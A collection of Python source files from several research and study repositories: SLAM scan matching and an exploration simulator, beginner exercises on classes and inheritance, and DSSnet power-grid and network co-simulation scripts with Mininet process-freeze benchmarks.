target_points, ret.target_pose.inverse()
)
ret.cov = self.keyframes[ret.source_key].cov
if not self.nssm_params.initialization:
return ret
with CodeTimer("SLAM - nonsequential scan matching - sampling"):
translation_std = np.sqrt(np.max(np.linalg.eigvals(cov[:2, :2])))
rotation_std = np.sqrt(cov[2, 2])
pose_stds = np.array([[translation_std, translation_std, rotation_std]]).T
pose_bounds = 5.0 * np.c_[-pose_stds, pose_stds]
# ret.occ = self.get_map(target_frames)
# subroutine, pose_samples = self.get_matching_cost_subroutine2(
# ret.source_points,
# ret.source_pose,
# ret.occ,
# )
subroutine, pose_samples = self.get_matching_cost_subroutine1(
ret.source_points,
ret.source_pose,
ret.target_points,
ret.target_pose,
ret.cov,
)
result = shgo(
func=subroutine,
bounds=pose_bounds,
n=self.nssm_params.initialization_params[0],
iters=self.nssm_params.initialization_params[1],
sampling_method="sobol",
minimizer_kwargs={
"options": {"ftol": self.nssm_params.initialization_params[2]}
},
)
if not result.success:
ret.status = STATUS.INITIALIZATION_FAILURE
ret.status.description = result.message
return ret
delta = n2g(result.x, "Pose2")
ret.estimated_source_pose = ret.source_pose.compose(delta)
ret.source_pose_samples = np.array(pose_samples)
ret.status.description = "matching cost {:.2f}".format(result.fun)
# Refine target key by searching for the pose with maximum overlap
# with current source points
estimated_source_points = Keyframe.transform_points(
ret.source_points, ret.estimated_source_pose
)
overlap, indices = self.get_overlap(
estimated_source_points, target_points, return_indices=True
)
target_frames1, counts1 = np.unique(
np.int32(target_keys[indices[indices != -1]]), return_counts=True
)
if len(counts1) == 0:
ret.status = STATUS.NOT_ENOUGH_OVERLAP
ret.status.description = "0"
return ret
if self.save_data:
ret.save("step-{}-nssm-sampling.npz".format(self.current_key - 1))
ret.target_key = target_frames1[np.argmax(counts1)]
ret.target_pose = self.keyframes[ret.target_key].pose
# Recalculate target points with new target key in target frame
ret.target_points = self.get_points(target_frames, ret.target_key)
return ret
def add_nonsequential_scan_matching(self):
"""
Add non-sequential scan matching factor.
kf[m - k1] -- ... -- kf[m] -- ... -- kf[m + k2] -- ... -- kf[t - p] -- ... -- kf[t]
|____ _____|________|________________| |_______________|
target points around kf[m] source points
"""
if self.current_key < self.nssm_params.min_st_sep:
return
ret = self.initialize_nonsequential_scan_matching()
if self.save_fig:
ret.plot("step-{}-nssm-sampling.png".format(self.current_key - 1))
if not ret.status:
return
ret2 = ICPResult(ret, self.nssm_params.cov_samples > 0)
# sample_deltas = np.random.uniform(-1, 1, (self.nssm_params.cov_samples, 3))
# sample_deltas[:, 0] *= self.icp_odom_sigmas[0] * 10
# sample_deltas[:, 1] *= self.icp_odom_sigmas[1] * 10
# sample_deltas[:, 2] *= self.icp_odom_sigmas[2] * 10
# ret2.initial_transforms = [
# ret2.initial_transform.compose(n2g(sample_delta, "Pose2"))
# for sample_delta in sample_deltas
# ]
# Compute ICP here with a timer
with CodeTimer("SLAM - nonsequential scan matching - ICP"):
if self.nssm_params.initialization and self.nssm_params.cov_samples > 0:
message, odom, cov, sample_transforms = self.compute_icp_with_cov(
ret2.source_points,
ret2.target_points,
ret2.initial_transforms[: self.nssm_params.cov_samples],
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret2.cov = cov
ret2.sample_transforms = sample_transforms
ret2.status.description = "{} samples".format(
len(ret2.sample_transforms)
)
else:
message, odom = self.compute_icp(
ret2.source_points, ret2.target_points, ret2.initial_transform
)
if message != "success":
ret2.status = STATUS.NOT_CONVERGED
ret2.status.description = message
else:
ret2.estimated_transform = odom
ret.status.description = ""
# Add some failure detections
# The transformation compared to initial guess can't be too large
if ret2.status:
delta = ret2.initial_transform.between(ret2.estimated_transform)
delta_translation = delta.translation().norm()
delta_rotation = abs(delta.theta())
if (
delta_translation > self.nssm_params.max_translation
or delta_rotation > self.nssm_params.max_rotation
):
ret2.status = STATUS.LARGE_TRANSFORMATION
ret2.status.description = "trans {:.2f} rot {:.2f}".format(
delta_translation, delta_rotation
)
# There must be enough overlap between two point clouds.
if ret2.status:
overlap = self.get_overlap(
ret2.source_points, ret2.target_points[:, :2], ret2.estimated_transform
)
if overlap < self.nssm_params.min_points:
ret2.status = STATUS.NOT_ENOUGH_OVERLAP
ret2.status.description = str(overlap)
if ret2.status:
if self.save_data:
ret2.save("step-{}-nssm-icp.npz".format(self.current_key - 1))
# # DCS
# if ret2.cov is not None:
# icp_odom_model = self.create_robust_full_noise_model(ret2.cov)
# else:
# icp_odom_model = self.create_robust_noise_model(self.icp_odom_sigmas)
# factor = gtsam.BetweenFactorPose2(
# X(ret2.target_key),
# X(ret2.source_key),
# ret2.estimated_transform,
# icp_odom_model,
# )
# self.graph.add(factor)
# self.keyframes[ret2.source_key].constraints.append(
# (ret2.target_key, ret2.estimated_transform)
# )
# ret2.inserted = True
while (
self.nssm_queue
and ret2.source_key - self.nssm_queue[0].source_key
> self.pcm_queue_size
):
self.nssm_queue.pop(0)
self.nssm_queue.append(ret2)
pcm = self.verify_pcm(self.nssm_queue)
for m in pcm:
ret2 = self.nssm_queue[m]
if not ret2.inserted:
if ret2.cov is not None:
icp_odom_model = self.create_full_noise_model(ret2.cov)
else:
icp_odom_model = self.icp_odom_model
factor = gtsam.BetweenFactorPose2(
X(ret2.target_key),
X(ret2.source_key),
ret2.estimated_transform,
icp_odom_model,
)
self.graph.add(factor)
self.keyframes[ret2.source_key].constraints.append(
(ret2.target_key, ret2.estimated_transform)
)
ret2.inserted = True
if self.save_fig:
ret2.plot("step-{}-nssm-icp.png".format(self.current_key - 1))
return ret2
def is_keyframe(self, frame):
if not self.keyframes:
return True
duration = frame.time - self.current_keyframe.time
if duration < self.keyframe_duration:
return False
dr_odom = self.keyframes[-1].dr_pose.between(frame.dr_pose)
translation = dr_odom.translation().norm()
rotation = abs(dr_odom.theta())
return (
translation > self.keyframe_translation or rotation > self.keyframe_rotation
)
def create_full_noise_model(self, cov):
return gtsam.noiseModel_Gaussian.Covariance(cov)
def create_robust_full_noise_model(self, cov):
model = gtsam.noiseModel_Gaussian.Covariance(cov)
robust = gtsam.noiseModel_mEstimator_DCS.Create(1.0)
return gtsam.noiseModel_Robust.Create(robust, model)
def create_noise_model(self, *sigmas):
return gtsam.noiseModel_Diagonal.Sigmas(np.r_[sigmas])
def create_robust_noise_model(self, *sigmas):
model = gtsam.noiseModel_Diagonal.Sigmas(np.r_[sigmas])
robust = gtsam.noiseModel_mEstimator_DCS.Create(1.0)
return gtsam.noiseModel_Robust.Create(robust, model)
def update_factor_graph(self, keyframe=None):
if keyframe:
self.keyframes.append(keyframe)
self.isam.update(self.graph, self.values)
self.graph.resize(0)
self.values.clear()
# Update all trajectory
values = self.isam.calculateEstimate()
for x in range(values.size()):
pose = values.atPose2(X(x))
self.keyframes[x].update(pose)
# Only update latest cov
cov = self.isam.marginalCovariance(X(values.size() - 1))
self.keyframes[-1].update(pose, cov)
for ret in self.nssm_queue:
ret.source_pose = self.keyframes[ret.source_key].pose
ret.target_pose = self.keyframes[ret.target_key].pose
if ret.inserted:
ret.estimated_transform = ret.target_pose.between(ret.source_pose)
def verify_pcm(self, queue):
"""
Get the pairwise consistent measurements.
Consistency of two measurements Tz_{il}, Tz_{jk} is defined as
Tz_{jk}^{-1} x (T_{j} x T_{ij}^{-1} x Tz_{il} T_{lk}), l < k
nssm_{il} nssm_{jk}
------- -------
| | | |
| i <-|-------------|-- j |
| | | | | |
| v | | v |
| l --|-------------|-> k |
------- -------
"""
if len(queue) < self.min_pcm:
return []
G = defaultdict(list)
for (a, ret_il), (b, ret_jk) in combinations(zip(range(len(queue)), queue), 2):
pi = ret_il.target_pose
pj = ret_jk.target_pose
pil = ret_il.estimated_transform
plk = ret_il.source_pose.between(ret_jk.source_pose)
pjk1 = ret_jk.estimated_transform
pjk2 = pj.between(pi.compose(pil).compose(plk))
error = gtsam.Pose2.Logmap(pjk1.between(pjk2))
md = error.dot(np.linalg.inv(ret_jk.cov)).dot(error)
# chi2.ppf(0.99, 3) = 11.34
if md < 11.34:
G[a].append(b)
G[b].append(a)
maximal_cliques = list(self.find_cliques(G))
if not maximal_cliques:
return []
maximum_clique = sorted(maximal_cliques, key=len, reverse=True)[0]
if len(maximum_clique) < self.min_pcm:
return []
return maximum_clique
def find_cliques(self, G):
"""Returns all maximal cliques in an undirected graph.
"""
if len(G) == 0:
return
adj = {u: {v for v in G[u] if v != u} for u in G}
Q = [None]
subg = set(G)
cand = set(G)
u = max(subg, key=lambda u: len(cand & adj[u]))
ext_u = cand - adj[u]
stack = []
try:
while True:
if ext_u:
q = ext_u.pop()
cand.remove(q)
Q[-1] = q
adj_q = adj[q]
subg_q = subg & adj_q
if not subg_q:
yield Q[:]
else:
cand_q = cand & adj_q
if cand_q:
stack.append((subg, cand, ext_u))
Q.append(None)
subg = subg_q
cand = cand_q
u = max(subg, key=lambda u: len(cand & adj[u]))
ext_u = cand - adj[u]
else:
Q.pop()
subg, cand, ext_u = stack.pop()
except IndexError:
pass
``` |
{
"source": "jinkunw/em_exploration",
"score": 3
} |
#### File: em_exploration/scripts/pyss2d.py
```python
import math
from ConfigParser import SafeConfigParser
import numpy as np
from scipy.stats.distributions import chi2
import ss2d
from utils import *
def read_sensor_params(config):
sensor_params = ss2d.BearingRangeSensorModelParameter()
sensor_params.bearing_noise = math.radians(config.getfloat('Sensor Model', 'bearing_noise'))
# sensor_params.range_noise = math.radians(config.getfloat('Sensor Model', 'range_noise'))
sensor_params.range_noise = config.getfloat('Sensor Model', 'range_noise')
sensor_params.min_bearing = math.radians(config.getfloat('Sensor Model', 'min_bearing'))
sensor_params.max_bearing = math.radians(config.getfloat('Sensor Model', 'max_bearing'))
sensor_params.min_range = config.getfloat('Sensor Model', 'min_range')
sensor_params.max_range = config.getfloat('Sensor Model', 'max_range')
return sensor_params
def read_control_params(config):
control_params = ss2d.SimpleControlModelParameter()
control_params.rotation_noise = math.radians(config.getfloat('Control Model', 'rotation_noise'))
control_params.translation_noise = config.getfloat('Control Model', 'translation_noise')
return control_params
def read_environment_params(config):
environment_params = ss2d.EnvironmentParameter()
environment_params.min_x = config.getfloat('Environment', 'min_x')
environment_params.max_x = config.getfloat('Environment', 'max_x')
environment_params.min_y = config.getfloat('Environment', 'min_y')
environment_params.max_y = config.getfloat('Environment', 'max_y')
environment_params.safe_distance = config.getfloat('Environment', 'safe_distance')
return environment_params
def read_virtual_map_params(config, map_params):
virtual_map_params = ss2d.VirtualMapParameter(map_params)
virtual_map_params.resolution = config.getfloat('Virtual Map', 'resolution')
virtual_map_params.sigma0 = config.getfloat('Virtual Map', 'sigma0')
virtual_map_params.num_samples = config.getint('Virtual Map', 'num_samples')
return virtual_map_params
def read_map_params(config, ext=5.0):
map_params = ss2d.EnvironmentParameter()
map_params.min_x = config.getfloat('Environment', 'min_x') - ext
map_params.max_x = config.getfloat('Environment', 'max_x') + ext
map_params.min_y = config.getfloat('Environment', 'min_y') - ext
map_params.max_y = config.getfloat('Environment', 'max_y') + ext
map_params.safe_distance = config.getfloat('Environment', 'safe_distance')
return map_params
class SS2D(object):
def __init__(self, config, verbose=False):
if isinstance(config, str):
self._config = load_config(config)
elif isinstance(config, SafeConfigParser):
self._config = config
else:
print('Config type not supported!')
self._sensor_params = read_sensor_params(self._config)
self._control_params = read_control_params(self._config)
self._environment_params = read_environment_params(self._config)
self._map_params = read_map_params(self._config)
self._virtual_map_params = read_virtual_map_params(self._config, self._map_params)
x0 = self._config.getfloat('Simulator', 'x0')
y0 = self._config.getfloat('Simulator', 'y0')
theta0 = math.radians(self._config.getfloat('Simulator', 'theta0'))
sigma_x0 = self._config.getfloat('Simulator', 'sigma_x0')
sigma_y0 = self._config.getfloat('Simulator', 'sigma_y0')
sigma_theta0 = math.radians(self._config.getfloat('Simulator', 'sigma_theta0'))
num_random_landmarks = self._config.getint('Simulator', 'num')
seed = self._config.getint('Simulator', 'seed')
if seed < 0:
seed = int(time() * 1e6)
self._sim = ss2d.Simulator2D(self._sensor_params, self._control_params, seed)
self._sim.initialize_vehicle(ss2d.Pose2(x0, y0, theta0))
self._slam = ss2d.SLAM2D(self._map_params)
self._virtual_map = ss2d.VirtualMap(self._virtual_map_params, seed)
if self._config.has_section('Landmarks') and self._config.has_option('Landmarks', 'x') and \
self._config.has_option('Landmarks', 'y'):
x = eval(self._config.get('Landmarks', 'x'))
y = eval(self._config.get('Landmarks', 'y'))
landmarks = []
for xi, yi in zip(x, y):
landmarks.append(ss2d.Point2(xi, yi))
self._sim.random_landmarks(landmarks, num_random_landmarks, self._environment_params)
else:
self._sim.random_landmarks([], num_random_landmarks, self._environment_params)
self.verbose = verbose
if self.verbose:
self._sim.pprint()
self._virtual_map_params.pprint()
self._slam.pprint()
initial_state = ss2d.VehicleBeliefState(self._sim.vehicle,
np.diag([1.0 / sigma_x0 ** 2, 1.0 / sigma_y0 ** 2,
1.0 / sigma_theta0 ** 2]))
self.step = 0
self._cleared = True
self._da_ground_truth = {}
self._slam.add_prior(initial_state)
self.measure()
self.optimize()
self.step += 1
def move(self, odom):
odom = ss2d.Pose2(odom[0], odom[1], odom[2])
_, self._control_state = self._sim.move(odom, True)
self._slam.add_odometry(self._control_state)
def measure(self):
self._measurements = self._sim.measure()
for key, m in self._measurements:
self._slam.add_measurement(key, m)
return
def optimize(self):
self._slam.optimize(update_covariance=True)
def update_virtual_map(self, update_probability=False, update_information=True):
if update_probability:
self._virtual_map.update_probability(self._slam, self._sim.sensor_model)
if update_information:
self._virtual_map.update_information(self._slam.map, self._sim.sensor_model)
def simulate(self, odom, core=True):
self.move(odom)
obstacle = False
###############################
measurements = self._sim.measure()
landmarks = [key for key, landmark in self._slam.map.iter_landmarks()]
for key, m in measurements:
if self._cleared:
if m.range < self._environment_params.safe_distance:
obstacle = True
self._cleared = False
break
else:
if key not in landmarks and m.range < self._environment_params.safe_distance:
obstacle = True
self._cleared = False
break
if not obstacle and core:
self._cleared = True
###############################
if not core and not obstacle:
return obstacle
self.step += 1
self.measure()
self.optimize()
self.update_virtual_map(True, True)
return obstacle
def simulate_simple(self, odom):
self.move(odom)
self.measure()
self.optimize()
self.update_virtual_map(True, True)
self.step += 1
@property
def distance(self):
return self._slam.map.distance
@property
def vehicle_position(self):
return self._slam.map.get_current_vehicle().pose
@property
def map(self):
return self._slam.map
@property
def environment(self):
return self._sim.environment
def plot(self, autoscale=False):
plot_environment(self._sim.environment, label=False)
plot_pose(self._sim.vehicle, self._sensor_params)
plot_measurements(self._sim.vehicle, self._measurements, label=False)
plot_map(self._slam.map, label=True)
if autoscale:
plt.gca().autoscale()
xlim = plt.gca().get_xlim()
ylim = plt.gca().get_ylim()
plot_virtual_map(self._virtual_map, self._map_params)
if autoscale:
plt.gca().set_xlim(xlim)
plt.gca().set_ylim(ylim)
# plot_samples(self._virtual_map)
def savefig(self, figname=None):
plot_environment(self._sim.environment, label=False)
plot_pose(self._sim.vehicle, self._sensor_params)
plot_measurements(self._sim.vehicle, self._measurements, label=False)
plot_map(self._slam.map, label=True)
plot_virtual_map(self._virtual_map, self._map_params)
# plot_samples(self._virtual_map)
if figname is None:
figname = 'step{}.png'.format(self.step)
plt.savefig(figname, dpi=200, bbox='tight')
plt.close()
if __name__ == '__main__':
import sys
ss = SS2D(sys.path[0] + '/pyss2d.ini')
ss.savefig()
for step in range(120):
if step == 10 or step == 20 or step == 40 or step == 60 or step == 80 or step == 100:
odom = 0, 0, math.pi / 2.0
else:
odom = 1, 0, 0
ss.simulate_simple(odom)
ss.savefig()
``` |
{
"source": "jinkyukim-me/StudyPython",
"score": 3
} |
#### File: StudyPython/exercises/ex43_classes.py
```python
print("""
* Map
- next_scene
- opening_scene
* Engine
- play
* Scene
- enter
* Death
* Central Corridor
* Laser Weapon Armory
* The Bridge
* Escape Pod
""")
class Scene(object):
def enter(self):
pass
class Engine(object):
def __init__(self, scene_map):
pass
def play(self):
pass
class Death(Scene):
def enter(self):
pass
class CentralCorridor(Scene):
def enter(self):
pass
class LaserWeaponArmory(Scene):
def enter(self):
pass
class TheBridge(Scene):
def enter(self):
pass
class EscapePod(Scene):
def enter(self):
pass
class Map(object):
def __init__(self, start_scene):
pass
def next_scene(self, scene_name):
pass
def opening_scene(self):
pass
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
```
#### File: StudyPython/exercises/ex44d.py
```python
class Parent(object):
"""A simple example class""" # 클래스 정의 시작부분에 """...""" 도큐먼트 스트링
def __init__(self): # 컨스트럭터 (생성자)
self.name = "Kim"
def override(self): # override() 메소드
print("PARENT override()")
def implicit(self): # implicit() 메소드
print("PARENT implicit()")
def altered(self): # altered() 메소드
print("PARENT altered()")
class Child(Parent):
def __init__(self): # 자식클래스 생성자
super().__init__() # 부모클래스 생성자
self.blood = "O" # blood 추가
def override(self):
print("CHILD override()") # override() 메소드
def altered(self): # altered() 메소드
print("CHILD, BEFORE PARENT altered()")
super(Child, self).altered() # super(자식클래스, self)로 부모클래스의 메서드 호출
print("CHILD, AFTER PARENT altered()")
dad = Parent() # 클래스의 인스턴스 생성
son = Child() # 클래스의 인스턴스 생성
dad.implicit()
son.implicit()
dad.override()
son.override()
dad.altered()
son.altered()
```
#### File: jinkyukim-me/StudyPython/type_3_arg.py
```python
class Tea(Base1, Base2):
party = 'Elice'
def Coding(self):
return 'Build Projects'
# Python essentially does this
def Coding(self):
return 'Build Projects'
body = {'party':'Elice', 'Coding': Coding}
Tea = type('Tea', (Base1, Base2), body)
``` |
{
"source": "JinLabIIT/DSSnet",
"score": 3
} |
#### File: benchmarks/old/iperftest.py
```python
import subprocess
PIDQ = "sudo pgrep -f mininet: > pidlist"
p=''
def pidList():
global p
list = subprocess.call(PIDQ,shell=True)
with open('pidlist', 'r') as ins:
for line in ins:
p+= ('%s%s' %(' -',line.rstrip('\n')))
print (p)
pidList()
PAUSE = 'sudo kill --signal SIGSTOP%s'%p
RESUME ='sudo kill --signal SIGCONT%s'%p
def Ptest():
process = subprocess.call(PAUSE, shell=True)
def Rtest():
process = subprocess.call(RESUME, shell=True)
```
#### File: scale/orig/avgPlotAll.py
```python
import sys
import matplotlib.pyplot as plt
import numpy as np
import six
import matplotlib.colors as colors
import matplotlib
import math
def plot_all(output_file):
plt.figure()
avg = []
std = []
conf_int = []
scales = [10, 50, 100, 250, 500]
for scale in scales:
freezeData = np.loadtxt("freeze_%s.txt" % scale)
unfreezeData = np.loadtxt("unfreeze_%s.txt" % scale)
size = len(freezeData)
freezeData *= 1000 # to milliseconds
unfreezeData *= 1000
sync = np.add(freezeData, unfreezeData)
avg.append(np.average(sync))
std.append(np.std(sync))
conf_int.append(np.std(sync) * 1.96 / math.sqrt(size))
matplotlib.rc('font', size=15)
plt.plot(scales, avg, color='blue', linewidth=2.0, label='Emulation Overhead')
plt.bar(scales, avg, width=35, color='white', yerr=std, ecolor='red', hatch='/')
plt.grid(True)
plt.xticks([10,50,100,150,200,250,300,350,400,450,500,550], horizontalalignment='left')
plt.xlabel('Number of Hosts', fontsize=20)
plt.ylabel('Average Overhead (Milliseconds)', fontsize=20)
plt.legend(loc='upper left')
plt.savefig(output_file, format='eps')
plt.show()
if __name__ == '__main__':
ls_name = ['solid', 'dashed', 'dashdot', 'dotted', '-', '--', '-.', ':']
colors_name = ['red', 'blue', 'cyan', 'peru', 'green', 'salmon', 'pink', 'lime', 'tan', 'seagreen', 'purple', 'wheat']
print colors_name
output = 'ScaleFrzAvg.eps'
plot_all(output)
```
#### File: scale/orig/benchmark_pause.py
```python
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import CPULimitedHost, Controller, OVSKernelSwitch, RemoteController, Host
from mininet.cli import CLI
from mininet.link import TCLink
from mininet.util import irange, dumpNodeConnections
from mininet.log import setLogLevel, info
import sys
import time
import os
import subprocess
import logging
log = str(sys.argv[2])
logging.basicConfig(filename=log,level=logging.DEBUG)
num_hosts = int(sys.argv[1])
pIDS = ''
def pidList(net):
global pIDS
for host in net.hosts :
pIDS += ' %s' % host.pid
for s in net.switches :
pIDS+= ' %s' % s.pid
for c in net.controllers:
pIDS += ' %s' %c.pid
#print ('pids subject to pause: %s'%pIDS)
NPAUSE = ''
NRESUME = ''
def setupPause():
global pIDS, NPAUSE, NRESUME
NPAUSE = 'sudo /home/kd/VirtualTimeKernel/test_virtual_time/freeze_all_procs -f -p %s'%pIDS
NRESUME = 'sudo /home/kd/VirtualTimeKernel/test_virtual_time/freeze_all_procs -u -p %s'%pIDS
def pause ():
before_time = time.time()
process = subprocess.call(NPAUSE,shell=True)
after_time = time.time()
logging.info('pause,%s'% (after_time-before_time))
def resume ():
before_time = time.time()
process = subprocess.call(NRESUME,shell=True)
after_time = time.time()
logging.info('resume,%s'% (after_time-before_time))
NPAUSE = ''
NRESUME = ''
class DssTopo(Topo):
"DSS custom topo"
def build(self, topoConfig='default.config'):
global num_hosts
for i in range(num_hosts):
host=self.addHost('H%s'%i)
def test(num):
for i in range(0, num):
time.sleep(0.1)
pause()
time.sleep(0.1)
resume()
def start():
topo = DssTopo()
net = Mininet(topo, link = TCLink)
net.start()
pidList(net)
setupPause()
#call loop
test(1000)
start()
```
#### File: tests/vtime/A.py
```python
import signal,os
import sys
import time
import gtod
def setup_pipe():
pipe_name = '/tmp/vtime_test.pipe'
if not os.path.exists(pipe_name):
os.mkfifo(pipe_name)
pipeout = os.open(pipe_name, os.O_WRONLY)
return pipeout
def send(msg,pipe):
msg_n = '%s\n'%msg
try:
os.write(pipe, msg_n.encode('utf-8'))
except BrokenPipeError:
# exit quietly..
exit()
if __name__ == '__main__':
my_pipe = setup_pipe()
while 1:
send(str(gtod.time()),my_pipe)
time.sleep(2)
```
#### File: net/DSSnet/DSSnet_events.py
```python
class Events:
'class for storing events in heap'
e_id = 0
def __init__(self, msg, time):
self.msg = msg
self.time = time
Events.e_id +=1
def __lt__(self,other):
val = self.time
otherval = other.time
return val < otherval
def get_event(self):
return self.msg
```
#### File: net/DSSnet/DSSnet_hosts.py
```python
class DSSnet_hosts:
'class for meta process/IED info'
p_id = 0
def __init__(self, msg, IED_id, command, ip, pipe = True):
self.properties= msg
self.IED_id = IED_id
self.process_id= DSSnet_hosts.p_id
self.command = command
self.ip = ip
self.pipe = pipe
DSSnet_hosts.p_id +=1
def number_processes(self):
return DSSnet_hosts.p_id
def get_host_name(self):
return self.IED_id
def get_ip(self):
return self.ip
def get_process_command(self):
return self.command
def display_process(self):
return('%s : %s : %s \n' % (self.process_id , self.IED_id, self.properties))
```
#### File: DSSnet/models/gen_normal.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
import gtod
TIME_INT = 0.1
Gen_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
#initialize values
gen_val1 = 250.0
gen_val2 = 250.0
gen_val3 = 250.0
load_1_val = 250.0
load_2_val = 250.0
load_3_val = 250.0
load_4_val = 250.0
'''
# listen for messages from the generator
# if new generator message
# update gen_val to new value
# listen for messages from loads, 1 - 4
# if new load message x
# update load_x_val to new value
# every 100 ms
# run function
# difference = gen - total load
# if difference is positive
# send message to energy storage to charge the difference
# else difference is negitive
# send message to energy storage to discharge battery
'''
logging.basicConfig(filename='%s.log'%Gen_ID,level=logging.DEBUG)
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
print('talking on %s:%s'%(server_IP,server_Port))
# open pipe to communicate to opendss
pipeout=pipe.setup_pipe_l(Gen_ID)
pipin = pipe.setup_pipe_w()
# send to control center
def send_cc(val):
global gen_val1
global gen_val2
global gen_val3
gens = val.split()
gen_val1 = float(gens[0])
gen_val2 = float(gens[1])
gen_val3 = float(gens[2])
dif1 = gen_val1 + 1292.0
dif2 = gen_val2 + 1039.0#(573 + load_1_val + load_2_val/2)
dif3 = gen_val3 + 1252.0#(880 + load_3_val + load_2_val/2)
print('difs')
print(dif1)
print(dif2)
print(dif3)
send_es('%s %s %s %s '% (dif1, dif2, dif3, time.time()))
def send_es(vall):
val = vall.encode('utf-8')
clientOut.send(val)
print 'sent but waiting for response'
status=clientOut.recv()
logging.debug('sent message to cc: %s '%val)
print 'sent'
def get_val():
update = 'update b p pre_gen_report post_gen_report %s %s 1 mon_wind_gen\n' %(time.time(),Gen_ID)
pipe.send_sync_event(update.encode('UTF-8'), pipin)
def t():
print(time.time())
time.sleep(2)# for sync to start properly
if os.fork():
while 1:
#listen to response and send to cc
x = pipe.listen(pipeout)
if x:
print x
send_cc(x)
time.sleep(0.001)
while 1:
time.sleep(TIME_INT)
get_val()
```
#### File: DSSnet/models/gtod.py
```python
import sys
from ctypes import *
libgtod = cdll.LoadLibrary('./models/libgtod.so')
def time():
#c_longdouble
gt = libgtod.gt
gt.restype = c_longdouble
t=gt()
#print ('%0.6f'%t)
#print str('%0.6f'%t)
#print ('%0.6f' %float(str('%0.6f'%t)))
return float(str('%0.6f'%t))
```
#### File: DSSnet/models/h2.py
```python
# get value from opendss
# send value of load to control center
import pipe
import sys
import time
import threading
import zmq
import os
import logging
TIME_INT = 0.1
Gen_ID = sys.argv[1]
server_IP = sys.argv[2]
server_Port = sys.argv[3]
contextOut = zmq.Context()
clientOut = contextOut.socket(zmq.REQ)
clientOut.connect("tcp://%s:%s" % (server_IP,server_Port))
# open pipe to communicate to opendss
pipeout=pipe.setup_pipe_l(Gen_ID)
#pipin = pipe.setup_pipe_w()
logging.basicConfig(filename='%s.log'%Gen_ID)
#print 'starting\n'
# send to control center
def send_es():
val = 'ok'.encode('utf-8')
start_time = time.time()
clientOut.send(val)
status=clientOut.recv()
logging.debug('%s' % str(time.time() - start_time))
print '%s' %(str(time.time() - start_time))
while 1:
time.sleep(TIME_INT)
send_es()
```
#### File: DSSnet/models/pmu.py
```python
import pipe
import time
import sys
import threading
pipout = pipe.setup_pipe_l(sys.argv[1])
pipin = pipe.setup_pipe_w()
from ctypes import *
#from numpy import array
libpmu=cdll.LoadLibrary('./models/libpmu.so')
class PMU:
def __init__(self, idcode, message_time_quality,
stn, data_format, phnmr,
annmr, dgnmr, chnam, phunit, anunit, digunit,
fnom, cfgcnt, data_rate, time_base, pdc_IP, pdc_port):
self.idcode = idcode
self.message_time_quality = message_time_quality
self.time_base = time_base
self.stn = stn
self.data_format = data_format
self.phnmr = phnmr
self.annmr = annmr
self.dgnmr = dgnmr
self.chnam = chnam
self.phunit = phunit
self.anunit = anunit
self.digunit = digunit
self.fnom = fnom
self.cfgcnt = cfgcnt
self.data_rate = data_rate
self.pdc_IP = pdc_IP
self.pdc_port = pdc_port
def prnt(p):
print (p.idcode)
print (p.message_time_quality)
print (p.time_base)
print (p.stn)
print (p.data_format)
print (p.phnmr)
print (p.annmr)
print (p.dgnmr)
print (p.chnam)
print (p.phunit)
print (p.anunit)
print (p.digunit)
print (p.fnom)
print (p.cfgcnt)
print (p.data_rate)
print (p.pdc_IP)
print (p.pdc_port)
def _cfg2(pmu):
#//print('hi0\n\n')
libpmu.cfg2_python(c_int(pmu.pdc_port),
c_int(pmu.idcode),
c_int(pmu.message_time_quality),
c_int(pmu.data_format),
c_char_p(pmu.stn),
c_int(pmu.phnmr),
c_int(pmu.annmr),
c_int(pmu.dgnmr),
(c_char_p(pmu.chnam)),
(pmu.phunit),
(pmu.anunit),
(pmu.digunit),
c_int(pmu.fnom),
c_int(pmu.cfgcnt),
c_int(pmu.data_rate),
c_int(pmu.time_base),
c_char_p(pmu.pdc_IP)
)
def _data(pmu, phasor_data, analog_data, digital_data, freq_data, dfreq_data):
libpmu.data_python(c_int(pmu.pdc_port),
c_int(pmu.idcode),
c_int(pmu.message_time_quality),
c_int(pmu.data_format),
c_char_p(pmu.stn),
c_int(pmu.phnmr),
c_int(pmu.annmr),
c_int(pmu.dgnmr),
(c_char_p(pmu.chnam)),
(pmu.phunit),
(pmu.anunit),
(pmu.digunit),
c_int(pmu.fnom),
c_int(pmu.cfgcnt),
c_int(pmu.data_rate),
c_int(pmu.time_base),
c_char_p(pmu.pdc_IP),
phasor_data,
analog_data,
digital_data,
freq_data,
dfreq_data
)
def read_pmu(filename):
with open(filename, 'r') as config:
phnmr = 0
annmr = 0
dgnmr = 0
data_format = 0
chna = ''
fnom = 0
message_time_quality = 0
phuni = []
anuni = []
diguni = []
for line in config:
line_split = line.split(',')
if line_split[0] == 'idcode':
idcode=int(line_split[1])
elif line_split[0] == 'stn':
stn = line_split[1].encode('utf-8')
elif line_split[0] == 'phnmr':
phnmr = int(line_split[1])
elif line_split[0] == 'annmr':
annmr = int(line_split[1])
elif line_split[0] == 'dgnmr':
dgnmr = int(line_split[1])
elif line_split[0] == 'chnam':
for x in range(1,1+dgnmr*16+annmr+phnmr):
new_d = pad(line_split[x],16)
chna += new_d
chnam = chna.encode('utf-8')
elif line_split[0] == 'fnom':
if line_split[1] == '50':
fnom = 1
elif line_split[0] == 'ip':
IP = line_split[1].encode('utf-8')
elif line_split[0] == 'data_format':
if line_split[1] == 'float':
data_format += 8
if line_split[2] == 'float':
data_format += 4
if line_split[3] == 'float':
data_format += 2
if line_split[4] == 'polar':
data_format += 1
elif line_split[0] == 'port':
port = ((line_split[1]))
elif line_split[0] == 'phunit':
for x in range(1,phnmr+1):
phuni.append(c_int(int(line_split[x])))
elif line_split[0] == 'anunit':
for x in range(1,annmr+1):
anuni.append(c_int(int(line_split[x])))
elif line_split[0] == 'digunit':
for x in range(1,dgnmr+1):
diguni.append(c_int(int(line_split[x])))
elif line_split[0] == 'cfgcnt':
cfgcnt = int(line_split[1])
elif line_split[0] == 'data_rate':
data_rate = int(line_split[1])
elif line_split[0] == 'time_base':
time_base = int(line_split[1])
phunit = (c_int*len(phuni))(*phuni)
